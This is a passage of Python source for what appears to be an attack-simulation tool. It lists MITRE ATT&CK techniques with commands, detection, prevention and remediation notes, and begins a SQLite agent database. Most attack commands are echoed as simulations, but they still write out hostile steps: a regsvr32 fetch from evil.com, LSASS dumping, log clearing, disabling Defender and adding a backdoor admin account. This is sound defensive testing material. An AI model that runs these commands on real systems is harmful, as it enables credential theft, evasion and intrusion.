        "prevention": "Vendor security assessment. Software composition analysis. Code signing.",
        "remediation": "Identify compromised software. Rollback to known-good version. Network isolation."
    },
    {
        "id": "dll_injection_sim",
        "name": "DLL Injection Simulation",
        "mitre_id": "T1055.001",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "high",
        "description": "Simulate DLL injection technique",
        "commands": [
            "echo [SIMULATION] CreateRemoteThread + LoadLibrary injection",
            "tasklist /m ntdll.dll",
            "echo [SIMULATION] Would inject malicious.dll into target process"
        ],
        "d3fend": ["D3-PSA (Process Spawn Analysis)", "D3-MAC (Module Authentication)"],
        "detection": "Monitor for remote thread creation. Track DLL loads in sensitive processes.",
        "prevention": "Enable CIG (Code Integrity Guard). Use process protection.",
        "remediation": "Terminate injected process. Scan for injected modules. Memory forensics."
    },
    {
        "id": "process_hollowing_sim",
        "name": "Process Hollowing Simulation",
        "mitre_id": "T1055.012",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "critical",
        "description": "Simulate process hollowing technique",
        "commands": [
            "echo [SIMULATION] Create suspended svchost.exe",
            "echo [SIMULATION] Unmap original code, inject malicious code",
            "echo [SIMULATION] Resume execution with malicious payload",
            "tasklist /fi \"imagename eq svchost.exe\""
        ],
        "d3fend": ["D3-PSA (Process Spawn Analysis)", "D3-PA (Process Analysis)"],
        "detection": "Monitor suspended process creation. Compare memory to disk image.",
        "prevention": "Enable memory integrity. Use attack surface reduction rules.",
        "remediation": "Memory dump analysis. Terminate hollowed process. Full system scan."
    },
    {
        "id": "thread_hijacking_sim",
        "name": "Thread Execution Hijacking",
        "mitre_id": "T1055.003",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "high",
        "description": "Simulate thread hijacking injection",
        "commands": [
            "echo [SIMULATION] SuspendThread on target",
            "echo [SIMULATION] Modify thread context (RIP/EIP)",
            "echo [SIMULATION] ResumeThread with hijacked execution"
        ],
        "d3fend": ["D3-PSA (Process Spawn Analysis)", "D3-PA (Process Analysis)"],
        "detection": "Monitor SetThreadContext API calls. Track thread suspension patterns.",
        "prevention": "Thread protection. Process isolation. Attack surface reduction.",
        "remediation": "Analyze thread contexts. Kill malicious threads. Process memory forensics."
    },
    {
        "id": "apc_injection_sim",
        "name": "APC Injection Simulation",
        "mitre_id": "T1055.004",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "high",
        "description": "Simulate Asynchronous Procedure Call injection",
        "commands": [
            "echo [SIMULATION] QueueUserAPC to inject shellcode",
            "echo [SIMULATION] Target alertable thread state",
            "echo [SIMULATION] APC executes on next alertable wait"
        ],
        "d3fend": ["D3-PSA (Process Spawn Analysis)", "D3-PA (Process Analysis)"],
        "detection": "Monitor QueueUserAPC calls. Track unusual APC patterns.",
        "prevention": "Restrict APC to signed code. Enable code integrity.",
        "remediation": "Analyze APC queues. Terminate affected processes. Memory forensics."
    },
    {
        "id": "pe_injection_sim",
        "name": "Portable Executable Injection",
        "mitre_id": "T1055.002",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "high",
        "description": "Simulate PE injection into running process",
        "commands": [
            "echo [SIMULATION] WriteProcessMemory with PE image",
            "echo [SIMULATION] Manual PE loading and relocation",
            "echo [SIMULATION] Execute injected PE entry point"
        ],
        "d3fend": ["D3-MAC (Module Authentication)", "D3-PA (Process Analysis)"],
        "detection": "Monitor WriteProcessMemory to executable regions. Track PE loads.",
        "prevention": "Code signing enforcement. Memory protection policies.",
        "remediation": "Dump injected PE. Analyze malware. Remediate affected system."
    },
    {
        "id": "regsvr32_execution",
        "name": "Regsvr32 Execution",
        "mitre_id": "T1218.010",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "high",
        "description": "Use regsvr32 to proxy execution (Squiblydoo)",
        "commands": [
            "where regsvr32.exe",
            "echo [SIMULATION] regsvr32 /s /n /u /i:http://evil.com/file.sct scrobj.dll",
            "echo [SIMULATION] Squiblydoo technique for proxy execution"
        ],
        "d3fend": ["D3-PSA (Process Spawn Analysis)", "D3-NTA (Network Traffic Analysis)"],
        "detection": "Monitor regsvr32 with /i flag and URLs. Alert on network connections.",
        "prevention": "Block regsvr32 network access. Application control.",
        "remediation": "Identify downloaded payloads. Block C2 connections."
    },
    {
        "id": "cmstp_execution",
        "name": "CMSTP Execution",
        "mitre_id": "T1218.003",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "high",
        "description": "Use CMSTP to bypass UAC and execute code",
        "commands": [
            "where cmstp.exe",
            "echo [SIMULATION] cmstp.exe /ni /s malicious.inf",
            "echo [SIMULATION] UAC bypass via auto-elevated COM object"
        ],
        "d3fend": ["D3-PSA (Process Spawn Analysis)", "D3-ACM (Access Control Monitoring)"],
        "detection": "Monitor cmstp.exe execution. Alert on INF file loading.",
        "prevention": "Restrict cmstp.exe execution. Monitor UAC bypasses.",
        "remediation": "Review cmstp execution logs. Remove malicious INF files."
    },
    {
        "id": "control_panel_execution",
        "name": "Control Panel Execution",
        "mitre_id": "T1218.002",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "medium",
        "description": "Execute code via Control Panel items",
        "commands": [
            "where control.exe",
            "echo [SIMULATION] control.exe malicious.cpl",
            "dir C:\\Windows\\System32\\*.cpl"
        ],
        "d3fend": ["D3-PSA (Process Spawn Analysis)", "D3-FA (File Analysis)"],
        "detection": "Monitor control.exe with unusual CPL files. Track CPL loads.",
        "prevention": "Restrict CPL file locations. Application whitelisting.",
        "remediation": "Remove malicious CPL files. Restore default control panels."
    },
    {
        "id": "javascript_execution",
        "name": "JavaScript/JScript Execution",
        "mitre_id": "T1059.007",
        "tactic": "Execution",
        "category": "Execution",
        "severity": "medium",
        "description": "Execute malicious JavaScript/JScript",
        "commands": [
            "where wscript.exe",
            "where cscript.exe",
            "echo [SIMULATION] wscript.exe malicious.js"
        ],
        "d3fend": ["D3-SEA (Script Execution Analysis)", "D3-PSA (Process Spawn Analysis)"],
        "detection": "Monitor wscript/cscript execution. Log script content.",
        "prevention": "Disable WSH. Associate JS/VBS with notepad.",
        "remediation": "Review executed scripts. Remove malicious script files."
    },
    {
        "id": "vbscript_execution",
        "name": "VBScript Execution",
        "mitre_id": "T1059.005",
        "tactic": "Execution",
        "category": "Execution",
        "severity": "medium",
        "description": "Execute malicious VBScript",
        "commands": [
            "echo [SIMULATION] cscript.exe malicious.vbs",
            "echo [SIMULATION] VBScript downloads and executes payload",
            "reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows Script Host\\Settings\" /v Enabled 2>nul"
        ],
        "d3fend": ["D3-SEA (Script Execution Analysis)", "D3-PSA (Process Spawn Analysis)"],
        "detection": "Monitor VBScript execution. Enable script logging.",
        "prevention": "Disable VBScript in browser. Block WSH scripts.",
        "remediation": "Analyze VBScript content. Remove dropped files."
    },
    {
        "id": "python_execution",
        "name": "Python Execution",
        "mitre_id": "T1059.006",
        "tactic": "Execution",
        "category": "Execution",
        "severity": "medium",
        "description": "Execute malicious Python scripts",
        "commands": [
            "where python.exe 2>nul || echo Python not found",
            "echo [SIMULATION] python.exe -c \"import os; os.system('whoami')\"",
            "echo [SIMULATION] Python used for post-exploitation"
        ],
        "d3fend": ["D3-SEA (Script Execution Analysis)", "D3-PSA (Process Spawn Analysis)"],
        "detection": "Monitor python.exe with suspicious arguments. Log Python script execution.",
        "prevention": "Restrict Python installation. Application whitelisting.",
        "remediation": "Review Python execution logs. Remove malicious scripts."
    },
    {
        "id": "masquerading_rename",
        "name": "Masquerading - Rename System Utilities",
        "mitre_id": "T1036.003",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "high",
        "description": "Simulate renaming executables to evade detection",
        "commands": [
            "echo [SIMULATION] copy cmd.exe to svchost.exe",
            "echo [SIMULATION] Attacker renames malware to legitimate name",
            "dir C:\\Windows\\System32\\svchost.exe"
        ],
        "d3fend": ["D3-FA (File Analysis)", "D3-FH (File Hashing)"],
        "detection": "Compare file hashes to known-good. Monitor file renames.",
        "prevention": "File integrity monitoring. Process hash validation.",
        "remediation": "Identify renamed binaries. Replace with legitimate files."
    },
    {
        "id": "masquerading_location",
        "name": "Masquerading - Match Legitimate Location",
        "mitre_id": "T1036.005",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "high",
        "description": "Place malware in trusted directory",
        "commands": [
            "echo [SIMULATION] Place malware in C:\\Windows\\System32",
            "echo [SIMULATION] Blend with legitimate system files",
            "dir C:\\Windows\\System32\\*.exe | findstr /c:\"svchost\""
        ],
        "d3fend": ["D3-FA (File Analysis)", "D3-SWI (System Integrity Monitoring)"],
        "detection": "Monitor file creation in system directories. Hash verification.",
        "prevention": "Protected folders. File integrity monitoring.",
        "remediation": "Identify misplaced files. Remove unauthorized executables."
    },
    {
        "id": "indicator_removal_logs",
        "name": "Indicator Removal - Clear Windows Logs",
        "mitre_id": "T1070.001",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "critical",
        "description": "Simulate clearing Windows event logs",
        "commands": [
            "echo [SIMULATION] wevtutil cl Security",
            "echo [SIMULATION] wevtutil cl System",
            "wevtutil gli Security"
        ],
        "d3fend": ["D3-LM (Log Management)", "D3-SWI (System Integrity Monitoring)"],
        "detection": "Alert on Event ID 1102 (Security log cleared). Monitor wevtutil.",
        "prevention": "Forward logs to SIEM immediately. Protected log storage.",
        "remediation": "Investigate log gaps. Restore from backup. Forensic timeline analysis."
    },
    {
        "id": "indicator_removal_files",
        "name": "Indicator Removal - File Deletion",
        "mitre_id": "T1070.004",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "high",
        "description": "Simulate malware self-deletion",
        "commands": [
            "echo [SIMULATION] del /f malware.exe",
            "echo [SIMULATION] SDelete secure deletion",
            "echo [SIMULATION] Timestomp to hide file modification"
        ],
        "d3fend": ["D3-FA (File Analysis)", "D3-FDM (File Deletion Monitoring)"],
        "detection": "Monitor file deletions in suspicious locations. USN journal analysis.",
        "prevention": "Endpoint backup. File integrity monitoring.",
        "remediation": "Recover deleted files. Analyze $MFT. Shadow copy restoration."
    },
    {
        "id": "timestomp_sim",
        "name": "Timestomping Simulation",
        "mitre_id": "T1070.006",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "medium",
        "description": "Simulate file timestamp modification",
        "commands": [
            "echo [SIMULATION] Modify $STANDARD_INFORMATION timestamps",
            "echo [SIMULATION] powershell (Get-Item file).LastWriteTime = '2020-01-01'",
            "echo Timestomping hides file creation/modification times"
        ],
        "d3fend": ["D3-FA (File Analysis)", "D3-SWI (System Integrity Monitoring)"],
        "detection": "Compare $SI and $FN timestamps in MFT. Detect anomalies.",
        "prevention": "NTFS auditing. File integrity monitoring.",
        "remediation": "Analyze MFT for true timestamps. Timeline reconstruction."
    },
    {
        "id": "bits_jobs",
        "name": "BITS Jobs Abuse",
        "mitre_id": "T1197",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "high",
        "description": "Abuse BITS for persistence and download",
        "commands": [
            "bitsadmin /list /allusers",
            "echo [SIMULATION] bitsadmin /create malicious_job",
            "echo [SIMULATION] bitsadmin /setnotifycmdline for persistence"
        ],
        "d3fend": ["D3-SDM (Scheduled Job Monitoring)", "D3-NTA (Network Traffic Analysis)"],
        "detection": "Monitor BITS job creation. Alert on SetNotifyCmdLine usage.",
        "prevention": "Restrict BITS admin access. Monitor BITS service.",
        "remediation": "List and remove malicious BITS jobs. Review BITS database."
    },
    {
        "id": "disable_defender",
        "name": "Disable Windows Defender",
        "mitre_id": "T1562.001",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "critical",
        "description": "Simulate disabling Windows Defender",
        "commands": [
            "echo [SIMULATION] Set-MpPreference -DisableRealtimeMonitoring $true",
            "sc query windefend",
            "reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\" /s | findstr /i disable"
        ],
        "d3fend": ["D3-SWI (System Integrity Monitoring)", "D3-AVS (Antivirus Scanning)"],
        "detection": "Monitor Defender status changes. Alert on tamper attempts.",
        "prevention": "Enable Tamper Protection. Centralized management.",
        "remediation": "Re-enable Defender. Investigate why it was disabled. Full scan."
    },
    {
        "id": "disable_event_logging",
        "name": "Disable Windows Event Logging",
        "mitre_id": "T1562.002",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "critical",
        "description": "Simulate disabling event logging service",
        "commands": [
            "echo [SIMULATION] sc config eventlog start= disabled",
            "sc query eventlog",
            "echo [SIMULATION] auditpol /clear"
        ],
        "d3fend": ["D3-LM (Log Management)", "D3-SWI (System Integrity Monitoring)"],
        "detection": "Monitor EventLog service status. Alert on auditpol changes.",
        "prevention": "Protect EventLog service. GPO enforcement.",
        "remediation": "Re-enable logging. Restore audit policy. Investigate log gap."
    },
    {
        "id": "rootkit_sim",
        "name": "Rootkit Behavior Simulation",
        "mitre_id": "T1014",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "critical",
        "description": "Simulate rootkit-like hiding techniques",
        "commands": [
            "echo [SIMULATION] Hook SSDT to hide processes",
            "echo [SIMULATION] Modify kernel structures to hide files",
            "echo [SIMULATION] Filter network traffic to hide connections"
        ],
        "d3fend": ["D3-SWI (System Integrity Monitoring)", "D3-EFA (Endpoint Forensic Analysis)"],
        "detection": "Use rootkit detection tools. Compare live vs offline analysis.",
        "prevention": "Secure Boot. Driver signing enforcement. Kernel integrity.",
        "remediation": "Boot from trusted media. DISM/SFC repair. Complete reinstall if severe."
    },
    {
        "id": "kerberoasting",
        "name": "Kerberoasting",
        "mitre_id": "T1558.003",
        "tactic": "Credential Access",
        "category": "Credential Access",
        "severity": "high",
        "description": "Simulate Kerberoasting attack for service account passwords",
        "commands": [
            "echo [SIMULATION] Request TGS for SPN accounts",
            "echo [SIMULATION] Rubeus.exe kerberoast",
            "setspn -Q */* 2>nul || echo SPN query requires domain"
        ],
        "d3fend": ["D3-AL (Authentication Logging)", "D3-CEM (Credential Encryption Monitoring)"],
        "detection": "Monitor TGS requests for SPNs. Alert on RC4 encryption requests.",
        "prevention": "Strong service account passwords. Group Managed Service Accounts.",
        "remediation": "Rotate service account passwords. Upgrade to AES encryption."
    },
    {
        "id": "asrep_roasting",
        "name": "AS-REP Roasting",
        "mitre_id": "T1558.004",
        "tactic": "Credential Access",
        "category": "Credential Access",
        "severity": "high",
        "description": "Simulate AS-REP Roasting for accounts without preauth",
        "commands": [
            "echo [SIMULATION] Query accounts with DONT_REQ_PREAUTH",
            "echo [SIMULATION] Rubeus.exe asreproast",
            "echo [SIMULATION] Crack AS-REP hashes offline"
        ],
        "d3fend": ["D3-AL (Authentication Logging)", "D3-UAM (User Account Management)"],
        "detection": "Monitor for AS-REQ without preauth. Alert on unusual account queries.",
        "prevention": "Require Kerberos preauth for all accounts. Strong passwords.",
        "remediation": "Enable preauth. Rotate affected account passwords."
    },
    {
        "id": "browser_cred_access",
        "name": "Browser Credential Theft",
        "mitre_id": "T1555.003",
        "tactic": "Credential Access",
        "category": "Credential Access",
        "severity": "high",
        "description": "Simulate stealing credentials from browsers",
        "commands": [
            "echo [SIMULATION] Access Chrome Login Data SQLite",
            "echo [SIMULATION] Decrypt passwords using DPAPI",
            "dir \"%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Login Data\" 2>nul"
        ],
        "d3fend": ["D3-DAM (Data Access Monitoring)", "D3-CEM (Credential Encryption Monitoring)"],
        "detection": "Monitor access to browser credential files. Track CryptUnprotectData.",
        "prevention": "Enterprise password managers. Browser credential protection.",
        "remediation": "Change all browser-saved passwords. Clear browser credential store."
    },
    {
        "id": "keylogging_sim",
        "name": "Keylogging Simulation",
        "mitre_id": "T1056.001",
        "tactic": "Credential Access",
        "category": "Credential Access",
        "severity": "high",
        "description": "Simulate keylogger behavior",
        "commands": [
            "echo [SIMULATION] SetWindowsHookEx for keyboard capture",
            "echo [SIMULATION] GetAsyncKeyState polling",
            "echo [SIMULATION] Raw input capture"
        ],
        "d3fend": ["D3-PA (Process Analysis)", "D3-DAM (Data Access Monitoring)"],
        "detection": "Monitor keyboard hook installations. Detect polling patterns.",
        "prevention": "Use password managers with autofill. Virtual keyboards for sensitive entry.",
        "remediation": "Remove keylogger. Change all typed passwords. Memory forensics."
    },
    {
        "id": "lsass_memory_dump",
        "name": "LSASS Memory Dump",
        "mitre_id": "T1003.001",
        "tactic": "Credential Access",
        "category": "Credential Access",
        "severity": "critical",
        "description": "Simulate LSASS memory dumping for credentials",
        "commands": [
            "echo [SIMULATION] procdump.exe -ma lsass.exe lsass.dmp",
            "echo [SIMULATION] comsvcs.dll MiniDump technique",
            "tasklist /fi \"imagename eq lsass.exe\" /v"
        ],
        "d3fend": ["D3-PA (Process Analysis)", "D3-CEM (Credential Encryption Monitoring)"],
        "detection": "Monitor LSASS access. Alert on memory dumps. Track procdump/comsvcs.",
        "prevention": "Credential Guard. LSASS PPL protection. Attack surface reduction.",
        "remediation": "Force all password resets. Enable enhanced protection."
    },
    {
        "id": "dcsync_sim",
        "name": "DCSync Attack Simulation",
        "mitre_id": "T1003.006",
        "tactic": "Credential Access",
        "category": "Credential Access",
        "severity": "critical",
        "description": "Simulate DCSync replication attack",
        "commands": [
            "echo [SIMULATION] Mimikatz lsadump::dcsync",
            "echo [SIMULATION] Replicate password hashes from DC",
            "echo [SIMULATION] GetNCChanges replication request"
        ],
        "d3fend": ["D3-NTA (Network Traffic Analysis)", "D3-AL (Authentication Logging)"],
        "detection": "Monitor Directory Replication Service requests. Alert on non-DC sources.",
        "prevention": "Restrict replication rights. Admin tiering model.",
        "remediation": "Reset KRBTGT twice. Reset all passwords. Review replication permissions."
    },
    {
        "id": "dns_c2",
        "name": "DNS Command and Control",
        "mitre_id": "T1071.004",
        "tactic": "Command and Control",
        "category": "Command and Control",
        "severity": "high",
        "description": "Simulate DNS-based C2 communication",
        "commands": [
            "echo [SIMULATION] Encoded commands in DNS TXT queries",
            "echo [SIMULATION] Data exfil via DNS subdomain encoding",
            "nslookup -type=txt google.com"
        ],
        "d3fend": ["D3-DNSA (DNS Analysis)", "D3-NTA (Network Traffic Analysis)"],
        "detection": "Monitor DNS query patterns. Detect long/encoded subdomains.",
        "prevention": "DNS filtering. Force internal DNS servers. DNS over HTTPS blocking.",
        "remediation": "Block malicious DNS. Identify compromised systems. Analyze C2 traffic."
    },
    {
        "id": "https_c2",
        "name": "HTTPS Command and Control",
        "mitre_id": "T1071.001",
        "tactic": "Command and Control",
        "category": "Command and Control",
        "severity": "high",
        "description": "Simulate HTTPS-based C2 communication",
        "commands": [
            "echo [SIMULATION] Beacon to C2 server via HTTPS",
            "echo [SIMULATION] Cobalt Strike malleable C2 profile",
            "netstat -ano | findstr :443"
        ],
        "d3fend": ["D3-NTA (Network Traffic Analysis)", "D3-TLS (TLS Inspection)"],
        "detection": "SSL inspection. Monitor connection patterns. JA3/JA3S fingerprinting.",
        "prevention": "Block uncategorized domains. Proxy all web traffic.",
        "remediation": "Block C2 domains. Terminate malicious connections. Endpoint cleanup."
    },
    {
        "id": "proxy_c2",
        "name": "Proxy for C2",
        "mitre_id": "T1090",
        "tactic": "Command and Control",
        "category": "Command and Control",
        "severity": "high",
        "description": "Simulate use of proxy for C2 obfuscation",
        "commands": [
            "echo [SIMULATION] Multi-hop proxy chain",
            "echo [SIMULATION] Domain fronting via CDN",
            "netsh winhttp show proxy"
        ],
        "d3fend": ["D3-NTA (Network Traffic Analysis)", "D3-NI (Network Isolation)"],
        "detection": "Monitor proxy configurations. Detect domain fronting.",
        "prevention": "Restrict proxy usage. Block unauthorized proxies.",
        "remediation": "Identify proxy chain. Block all hops. Trace back to source."
    },
    {
        "id": "data_encoding_c2",
        "name": "Data Encoding for C2",
        "mitre_id": "T1132.001",
        "tactic": "Command and Control",
        "category": "Command and Control",
        "severity": "medium",
        "description": "Simulate encoded C2 communication",
        "commands": [
            "echo [SIMULATION] Base64 encoded commands",
            "echo [SIMULATION] XOR encrypted traffic",
            "echo [SIMULATION] Custom encoding scheme"
        ],
        "d3fend": ["D3-NTA (Network Traffic Analysis)", "D3-DA (Dynamic Analysis)"],
        "detection": "Inspect traffic for encoding patterns. ML-based anomaly detection.",
        "prevention": "Deep packet inspection. Protocol enforcement.",
        "remediation": "Decode traffic. Extract IOCs. Block encoding patterns."
    },
    {
        "id": "remote_access_tools",
        "name": "Remote Access Software",
        "mitre_id": "T1219",
        "tactic": "Command and Control",
        "category": "Command and Control",
        "severity": "high",
        "description": "Simulate abuse of remote access tools",
        "commands": [
            "echo [SIMULATION] TeamViewer/AnyDesk for persistence",
            "echo [SIMULATION] Legitimate tool for malicious access",
            "tasklist | findstr /i \"teamviewer anydesk\""
        ],
        "d3fend": ["D3-PSA (Process Spawn Analysis)", "D3-NTA (Network Traffic Analysis)"],
        "detection": "Monitor for unauthorized remote tools. Alert on new installations.",
        "prevention": "Block unauthorized remote access software. Application control.",
        "remediation": "Uninstall unauthorized tools. Review remote access logs."
    },
    {
        "id": "ad_enumeration",
        "name": "Active Directory Enumeration",
        "mitre_id": "T1087.002",
        "tactic": "Discovery",
        "category": "Discovery",
        "severity": "medium",
        "description": "Enumerate Active Directory objects",
        "commands": [
            "net group /domain 2>nul || echo Not domain joined",
            "net user /domain 2>nul || echo Not domain joined",
            "echo [SIMULATION] LDAP queries for AD objects"
        ],
        "d3fend": ["D3-AL (Authentication Logging)", "D3-NTA (Network Traffic Analysis)"],
        "detection": "Monitor LDAP queries. Alert on BloodHound-like enumeration.",
        "prevention": "Restrict AD query permissions. Tier administrative access.",
        "remediation": "Review queried objects. Assess exposure. Limit query permissions."
    },
    {
        "id": "permission_groups",
        "name": "Permission Groups Discovery",
        "mitre_id": "T1069",
        "tactic": "Discovery",
        "category": "Discovery",
        "severity": "medium",
        "description": "Enumerate permission groups",
        "commands": [
            "net localgroup",
            "net group \"Domain Admins\" /domain 2>nul",
            "net group \"Enterprise Admins\" /domain 2>nul"
        ],
        "d3fend": ["D3-AL (Authentication Logging)", "D3-UAM (User Account Management)"],
        "detection": "Monitor group enumeration. Alert on privileged group queries.",
        "prevention": "Restrict group information access. Admin tiering.",
        "remediation": "Review group memberships. Remove unnecessary privileges."
    },
    {
        "id": "network_share_discovery",
        "name": "Network Share Discovery",
        "mitre_id": "T1135",
        "tactic": "Discovery",
        "category": "Discovery",
        "severity": "medium",
        "description": "Enumerate network shares",
        "commands": [
            "net share",
            "net view \\\\localhost 2>nul",
            "echo [SIMULATION] net view /domain"
        ],
        "d3fend": ["D3-NTA (Network Traffic Analysis)", "D3-ACM (Access Control Monitoring)"],
        "detection": "Monitor share enumeration. Alert on mass share scanning.",
        "prevention": "Disable null sessions. Restrict share permissions.",
        "remediation": "Review share access logs. Restrict sensitive shares."
    },
    {
        "id": "software_discovery",
        "name": "Software Discovery",
        "mitre_id": "T1518",
        "tactic": "Discovery",
        "category": "Discovery",
        "severity": "low",
        "description": "Enumerate installed software",
        "commands": [
            "wmic product get name,version",
            "reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" /s | findstr DisplayName",
            "powershell -c \"Get-WmiObject -Class Win32_Product | Select Name\""
        ],
        "d3fend": ["D3-SDA (System Dependency Analysis)", "D3-SCI (Software Configuration Inspection)"],
        "detection": "Monitor software enumeration. Baseline normal admin activity.",
        "prevention": "Restrict WMI access. Limit registry query permissions.",
        "remediation": "Review enumerated software list. Assess vulnerability exposure."
    },
    {
        "id": "service_stop",
        "name": "Service Stop",
        "mitre_id": "T1489",
        "tactic": "Impact",
        "category": "Impact",
        "severity": "high",
        "description": "Simulate stopping critical services",
        "commands": [
            "echo [SIMULATION] net stop vss",
            "echo [SIMULATION] net stop sql",
            "sc query type= service state= running | findstr \"SERVICE_NAME\""
        ],
        "d3fend": ["D3-SM (Service Monitoring)", "D3-SWI (System Integrity Monitoring)"],
        "detection": "Monitor service stop commands. Alert on critical service stops.",
        "prevention": "Restrict service control. Protected services.",
        "remediation": "Restart stopped services. Investigate cause. Review service logs."
    },
    {
        "id": "system_shutdown",
        "name": "System Shutdown/Reboot",
        "mitre_id": "T1529",
        "tactic": "Impact",
        "category": "Impact",
        "severity": "high",
        "description": "Simulate system shutdown for impact",
        "commands": [
            "echo [SIMULATION] shutdown /s /t 0",
            "echo [SIMULATION] Ransomware reboot after encryption",
            "query session 2>nul || echo No sessions"
        ],
        "d3fend": ["D3-SWI (System Integrity Monitoring)", "D3-LM (Log Management)"],
        "detection": "Monitor shutdown commands. Alert on unexpected reboots.",
        "prevention": "Restrict shutdown permissions. Require MFA for shutdown.",
        "remediation": "Investigate shutdown cause. Check for ransomware. Restore from backup."
    },
    {
        "id": "account_manipulation",
        "name": "Account Manipulation",
        "mitre_id": "T1098",
        "tactic": "Persistence",
        "category": "Persistence",
        "severity": "high",
        "description": "Simulate account manipulation for persistence",
        "commands": [
            "echo [SIMULATION] net user backdoor Password123 /add",
            "echo [SIMULATION] net localgroup administrators backdoor /add",
            "net user"
        ],
        "d3fend": ["D3-UAM (User Account Management)", "D3-AL (Authentication Logging)"],
        "detection": "Monitor account creation. Alert on privilege escalation.",
        "prevention": "Restrict account management. Audit privilege changes.",
        "remediation": "Remove unauthorized accounts. Review all account changes."
    },
    {
        "id": "data_destruction",
        "name": "Data Destruction",
        "mitre_id": "T1485",
        "tactic": "Impact",
        "category": "Impact",
        "severity": "critical",
        "description": "Simulate data destruction (wiper behavior)",
        "commands": [
            "echo [SIMULATION] Overwrite MBR with zeros",
            "echo [SIMULATION] Format drives",
            "echo [SIMULATION] Wiper malware behavior"
        ],
        "d3fend": ["D3-BDR (Backup and Data Recovery)", "D3-SWI (System Integrity Monitoring)"],
        "detection": "Monitor disk write patterns. Alert on MBR modifications.",
        "prevention": "Offline backups. Disk write protection. Air-gapped recovery.",
        "remediation": "Boot from recovery media. Restore from backup. Forensic imaging."
    },
    {
        "id": "defacement",
        "name": "Defacement",
        "mitre_id": "T1491",
        "tactic": "Impact",
        "category": "Impact",
        "severity": "medium",
        "description": "Simulate website/system defacement",
        "commands": [
            "echo [SIMULATION] Modify web server content",
            "echo [SIMULATION] Change wallpaper to ransom note",
            "echo [SIMULATION] Display attacker message"
        ],
        "d3fend": ["D3-SWI (System Integrity Monitoring)", "D3-FA (File Analysis)"],
        "detection": "Monitor web content changes. File integrity monitoring.",
        "prevention": "Web application firewall. Content versioning.",
        "remediation": "Restore original content. Review access logs. Patch vulnerabilities."
    },
    {
        "id": "email_forwarding_rule",
        "name": "Email Forwarding Rule",
        "mitre_id": "T1114.003",
        "tactic": "Collection",
        "category": "Collection",
        "severity": "high",
        "description": "Simulate malicious email forwarding rules",
        "commands": [
            "echo [SIMULATION] Create Outlook forwarding rule",
            "echo [SIMULATION] Forward all email to attacker",
            "echo [SIMULATION] Exchange Online inbox rule manipulation"
        ],
        "d3fend": ["D3-MA (Message Analysis)", "D3-UAM (User Account Management)"],
        "detection": "Monitor inbox rule creation. Alert on external forwarding.",
        "prevention": "Block external forwarding. Audit inbox rules.",
        "remediation": "Remove malicious rules. Review forwarded emails. Reset credentials."
    },
    {
        "id": "email_hiding_rule",
        "name": "Email Hiding Rule",
        "mitre_id": "T1564.008",
        "tactic": "Defense Evasion",
        "category": "Defense Evasion",
        "severity": "high",
        "description": "Simulate email rules to hide evidence",
        "commands": [
            "echo [SIMULATION] Create rule to delete security alerts",
            "echo [SIMULATION] Move emails to hidden folder",
            "echo [SIMULATION] Mark emails as read automatically"
        ],
        "d3fend": ["D3-MA (Message Analysis)", "D3-UAM (User Account Management)"],
        "detection": "Audit all inbox rules. Alert on delete/move rules.",
        "prevention": "Limit inbox rule creation. Regular rule audits.",
        "remediation": "Remove hiding rules. Restore deleted emails from retention."
    },
    {
        "id": "archive_collected_data",
        "name": "Archive Collected Data",
        "mitre_id": "T1560.001",
        "tactic": "Collection",
        "category": "Collection",
        "severity": "medium",
        "description": "Simulate archiving data for exfiltration",
        "commands": [
            "echo [SIMULATION] 7z a -p exfil.7z sensitive_data",
            "echo [SIMULATION] Compress and encrypt collected files",
            "where 7z.exe 2>nul || echo 7-Zip not found"
        ],
        "d3fend": ["D3-FA (File Analysis)", "D3-DEE (Data Exfiltration Detection)"],
        "detection": "Monitor archive creation. Alert on encryption with passwords.",
        "prevention": "Block archive tools. DLP monitoring.",
        "remediation": "Identify archived data. Assess data exposure."
    },
    {
        "id": "automated_collection",
        "name": "Automated Collection",
        "mitre_id": "T1119",
        "tactic": "Collection",
        "category": "Collection",
        "severity": "medium",
        "description": "Simulate automated data collection scripts",
        "commands": [
            "echo [SIMULATION] Script collects all .docx files",
            "echo [SIMULATION] Automated database dump",
            "echo [SIMULATION] Scheduled collection task"
        ],
        "d3fend": ["D3-SDM (Scheduled Job Monitoring)", "D3-DAM (Data Access Monitoring)"],
        "detection": "Monitor bulk file access. Alert on database dumps.",
        "prevention": "DLP policies. Access logging. Data classification.",
        "remediation": "Identify collected data. Remove collection scripts."
    }
]


# ============================================================================
# DATABASE LAYER - SQLite for local persistence
# ============================================================================

class LocalDatabase:
    """SQLite database for persistent local storage."""
    
    def __init__(self, db_path: str = None):
        if db_path is None:
            db_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'mersad_data.db')
        self.db_path = db_path
        self._init_db()
    
    def _init_db(self):
        """Initialize database tables."""
        conn = sqlite3.connect(self.db_path)
        cursor = conn.cursor()
        
        cursor.execute('''
            CREATE TABLE IF NOT EXISTS agents (
                id TEXT PRIMARY KEY,
                ip TEXT NOT NULL,
                port INTEGER NOT NULL,
                hostname TEXT,
                platform TEXT,
                status TEXT,
                last_seen TEXT,
                created_at TEXT
            )
        ''')
        
        cursor.execute('''
